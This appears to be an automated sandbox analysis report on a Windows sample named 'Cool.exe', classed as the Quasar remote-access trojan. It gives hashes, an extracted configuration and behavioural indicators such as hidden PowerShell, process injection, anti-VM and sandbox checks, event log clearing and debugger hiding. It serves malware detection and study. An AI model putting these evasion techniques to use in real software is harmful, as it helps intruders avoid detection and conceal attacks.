Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
Cool.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Cool.exe
Resource
win10v2004-20241007-en
General
-
Target
Cool.exe
-
Size
7.4MB
-
MD5
a4ca130e28b42a5cadb6499ecdb8cbf3
-
SHA1
d3a6e00243b76e6d549a5978fe4cfd2be00c6762
-
SHA256
58b023b2f159ddc8d2980121e1d92f4c9d3191f215772c00e8b4979c96612f22
-
SHA512
4733614f8416eaff00e85e1eb51f7123dbd6b818e83ead795039c650b7f48538c8a0b5d846e654b8a329ea8e0a9b555bd7526dda743fba26a93c3a3c77ad7e87
-
SSDEEP
196608:HMRAj7qnuvwmR+hd5s4iMket2/cEbC/julftfuhk7BxB:1Qg+5cRC2FfUkVT
Malware Config
Extracted
quasar
-
encryption_key
03816C045CDE13385E227545D99CA4F0BBE6CC9F
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/5048-2405-0x00000218775B0000-0x0000021877D34000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2508 created 1516 2508 WerFault.exe 89 PID 2876 created 5048 2876 WerFault.exe 112 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1516 created 608 1516 powershell.exe 5 PID 2816 created 1516 2816 svchost.exe 89 PID 5048 created 608 5048 powershell.exe 5 PID 2816 created 5048 2816 svchost.exe 112 PID 2816 created 5048 2816 svchost.exe 112 -
Blocklisted process makes network request 2 IoCs
flow pid Process 36 5048 powershell.exe 38 5048 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1516 powershell.exe 5048 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Cool.exe -
Executes dropped EXE 1 IoCs
pid Process 3036 kAffre.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\$nya-0bKfxmTs svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1516 set thread context of 1780 1516 powershell.exe 94 PID 5048 set thread context of 1896 5048 powershell.exe 113 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\kAffre.exe powershell.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 30 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00180011DEBBD65E" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00180011DEBBD65E" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735456443" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d976ac2283a19d4e9f4d3ff13c8959940000000002000000000010660000000100002000000049ea7065acd13303151cd0ee5178a2f369e1eea13663178cca6baae8d8853c8b000000000e8000000002000020000000ebfc77c8379e4b1817a5ec1c0f91e2b7e4bb73afb50a6c4cc82a3bfcec25921ab0030000312145b9998016a8bdec519f9cdad1ae5fdd07b71b43af3b7f104ba5d752b99caade375c144358516107e4814b9d27f508c5fb52a2b968c09e06ae64fb818d8cf7d1f7b9ad3fbc5ded17f727350290bc31bae7e1052bc068a02734e8a07de3a80ff1e8374aca8e7975c475d85bcdeb165bc341ca8bfcb5ae624f20a8f74d5e78366b67331ef312aab54c553ba59e158ff6c7e4d73baa413f49be4ceacdeb93ddb2a032488331c984e0439301f16d28da826377558f00d39e9c99c9fe19c6e2296a3ebe931581a6e112f44991c752051d1f6231def19997686fa5ebdca4cbdb8c97e76dd416de020f58807e9a07f8a5822d631537e7898f5297320f5283b86035122d3714fdc23c04e323cf4e2a702e2ddbc71ac371ea0ec292cf0e314775e76384f153c96025a2abfd9c48b7b61b5186dea9145027b2f18437c480c9f5da8363eb242f841acc5cfae6beb969f2bc6063a76aaa20de3a4eb56e2943c33582004ae4bb249bb341e7f190c38c278abcb959457f58cc0cfd9ebe21c179fa91d9704cc1e738c7c189f40c781c8a7c91e67b71197ada1064fe61a3926b4a862167ec468611676079f5e2afb4bfc0a20622f3871c768cb6299e330af405eac9c88a38ed166600ef36117d9f795d79ea3965e7f04e00cd831e2163f33a75db9c7e02b2e0d4da47a9ef36bb33e3a8a15d81c8bfd6b1dcabe17fd3c4e7e6de451560c232e64bd119279956ca6e0f48de45f12224502c5b1a1568dec2a88794761cdb7ab35e5a52ebb4b13bec26ccc0513cc24e5d777efa0c03573f7be3eee7db057c9ab85675369274f996aba681757c0b53c4b864505a4c2c53a2a50f9ff967e7af241ac4875ec262c7e6cf087cd2a2aeb991c437212192c7774da5d325da2b49252d1d51f12e21f08a38695fb87bb4aa44d2766ab64b6a509cc7327017b83901c24118a67b4bf5d5d514fbbd78336f348d166bc6a6d5db53b38be118a2606859eb6bf634493c43d0f3e83565b1b355352233c7aa4b941c25dd396cce6c492983b038b3943156db371793baddbbc476b604790735bddc3d0b95277ce3ee6c052bc04c3201d7d9172f07ebc87ef9740948d863d14d991745e797384479dce519ad606f9651a34f58a1f90bd712dacef3a9d30e93a73dbb22c34a4076f9cb90ca30d8e00b8b5309d98fee597be42a349035756e444d136e60f508569d215697cc3999d536a9d13a6402b84ded5f35993db21f660daceca9ffbd692a5fe18460bcedf41fb468e082ad60c3aca90a22ad7f03d7f3dcb8dc73762186e94ce44f451355be540f8f9937f99bdd743aea8ca3901321c1c0144000000043b6255ff98b9ecc9a952ef9fc9ae7742f3988f9a2464ec67cd59d9bcbcbb4f34e3253ec85ae59dc5df7c92fca6d8ac773a32bddef07d2ed9399c6bd06a57e80 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028F791C-9EDF-47B3-B697-8CBCC2DA956D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 29 Dec 2024 07:14:03 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4050598569-1597076380-177084960-1000\02jjckhalvjundjr\DeviceId = "<Data><User username=\"02JJCKHALVJUNDJR\"><HardwareInfo BoundTime=\"1735456442\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00180011DEBBD65E = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d976ac2283a19d4e9f4d3ff13c8959940000000002000000000010660000000100002000000034cf2b87c70d72732e4a4cbfd8734ae6aa52d70a156a20b3151e8b696542aa7a000000000e8000000002000020000000d2d2765de1cd26e9f3504aef79f684a20021c9db6ce5e994b0f5aec025b328d88000000062b2867e572964e767d4ae729151208468d57630ffd941ed8ffedf9c76c9cad6f6c46875d11a99c5cab13b6a8ddf59bc98c46d7076a439c546ca197ffa7cd7972edc2121250933d5c59817d77794dc47244c04e8f024422b25bd9bc8eb3ad4c4547e2fa522ac617b8b91ceced9b31f897fa2a6973ccecfd9edd452298374ae7d400000008bb2ef7cb677bde52bff9cf10dccdc479df75d61c0b5ab64907f06665789d69d412d56a8d4f3749158f757e6cd7d4ef4759368719920fa3c89b805ba6f066190 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4050598569-1597076380-177084960-1000\02jjckhalvjundjr\DeviceId = "<Data><User username=\"02JJCKHALVJUNDJR\"><HardwareInfo BoundTime=\"1728296822\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe 1780 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3392 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 1780 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 3392 Explorer.EXE Token: SeCreatePagefilePrivilege 3392 Explorer.EXE Token: SeShutdownPrivilege 3392 Explorer.EXE Token: SeCreatePagefilePrivilege 3392 Explorer.EXE Token: SeShutdownPrivilege 4784 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4784 mousocoreworker.exe Token: SeShutdownPrivilege 4784 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4784 mousocoreworker.exe Token: SeShutdownPrivilege 3392 Explorer.EXE Token: SeCreatePagefilePrivilege 3392 Explorer.EXE Token: SeShutdownPrivilege 3392 Explorer.EXE Token: SeCreatePagefilePrivilege 3392 Explorer.EXE Token: SeShutdownPrivilege 3392 Explorer.EXE Token: SeCreatePagefilePrivilege 3392 Explorer.EXE -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 3392 Explorer.EXE 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe 1092 msedge.exe -
Suspicious use of SendNotifyMessage 38 IoCs
